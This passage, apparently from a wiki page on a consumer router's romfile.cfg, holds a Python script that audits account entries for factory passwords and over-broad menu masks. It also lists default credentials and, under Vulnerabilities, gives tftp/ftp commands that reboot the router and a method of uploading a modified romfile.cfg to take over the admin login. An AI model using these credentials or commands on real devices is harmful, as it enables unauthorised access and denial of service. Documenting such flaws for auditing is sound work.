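Because the romfile.cfg is plain XML, the Account entries shown above can be audited before a backup is restored or after a device is taken into inventory. The following Python script is an added example, not part of the original page or the vendor's tooling: it parses a constructed, well-formed Account block (attribute names taken from the fragments above, password values being the factory defaults documented on this page) and flags entries that still carry factory credentials or whose display_mask grants menus beyond what Entry0 has.

```python
import xml.etree.ElementTree as ET

# Constructed sample: an <Account> block shaped like the romfile.cfg fragments on this page.
# The self-closing entries are an assumption about the full file's layout.
ROMFILE_FRAGMENT = """\
<Account>
  <Entry0 username="admin" web_passwd="c1@r0" console_passwd="c1@r0"
          display_mask="DF FF F7 BF FF DF FF FF FF" />
  <Entry1 username="qwertyuiop" web_passwd="1234567890"
          display_mask="D2 8C 84 8C 8C 8C 8C 8C 8C" />
  <Entry2 username="user3" web_passwd="1234567890"
          display_mask="FF FF FF FF FF FF FF FF FF" />
</Account>
"""

# Factory credentials documented on this page for login1..login3.
FACTORY_CREDENTIALS = {
    ("admin", "c1@r0"),
    ("qwertyuiop", "1234567890"),
    ("user3", "1234567890"),
}


def parse_mask(text):
    """Turn 'DF FF F7 ...' into a list of ints; a bare '6' (as in Entry2 on this page) reads as 0x06."""
    return [int(tok, 16) for tok in text.split()]


def parse_accounts(xml_text):
    """Return one dict per EntryN child of <Account>, in document order."""
    root = ET.fromstring(xml_text)
    accounts = []
    for el in root:
        if not el.tag.startswith("Entry"):
            continue
        accounts.append({
            "entry": el.tag,
            "username": el.get("username", ""),
            "web_passwd": el.get("web_passwd", ""),
            "console_passwd": el.get("console_passwd"),  # only Entry0 carries it on this page
            "mask": parse_mask(el.get("display_mask", "")),
        })
    return accounts


def audit_accounts(xml_text):
    """Map username -> list of findings: factory passwords and over-permissive display_masks."""
    accounts = parse_accounts(xml_text)
    admin_mask = accounts[0]["mask"]  # Entry0 is the admin account on this page
    findings = {}
    for acct in accounts:
        issues = []
        if (acct["username"], acct["web_passwd"]) in FACTORY_CREDENTIALS:
            issues.append("factory web password")
        console = acct["console_passwd"]
        if console and (acct["username"], console) in FACTORY_CREDENTIALS:
            issues.append("factory console password")
        if acct["entry"] != "Entry0":
            # A bit set here but clear in the admin mask is a menu admin itself cannot see.
            extra = any(m & (~a & 0xFF) for m, a in zip(acct["mask"], admin_mask))
            if extra:
                issues.append("display_mask broader than admin")
            if acct["mask"] and all(byte == 0xFF for byte in acct["mask"]):
                issues.append("display_mask unrestricted")
        findings[acct["username"]] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit_accounts(ROMFILE_FRAGMENT).items():
        print(f"{user}: {', '.join(issues) or 'ok'}")
```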

Vulnerabilities

Uploading any file of any size by tftp or ftp reboots the router!

$ echo "text" > file
$ tftp 192.168.1.1
tftp> put file
Sent 6 bytes in 13.9 seconds
$ ftp 192.168.1.1
220 bftpd 2.2 at 192.168.1.1 ready.
Name (192.168.1.1:xxx): admin
331 Password please.
Password: *****
230 User logged in.
ftp> put file
local: file remote: file
200 PORT 192.168.1.100:44443 OK
150 BINARY data connection established.
The firmware is illegal!!
6 bytes sent in 0.00 secs (1813.6 kB/s)

Uploading a modified romfile.cfg via tftp allows arbitrary login. The "Sent NNNNN bytes in NN seconds" message should appear; otherwise the romfile was not accepted (although the router reboots).

<Account>
  <Entry0 username="admin" web_passwd="stardust" console_passwd="stardust"
$ tftp 192.168.1.1
tftp> put romfile.cfg
Sent 29121 bytes in 13.5 seconds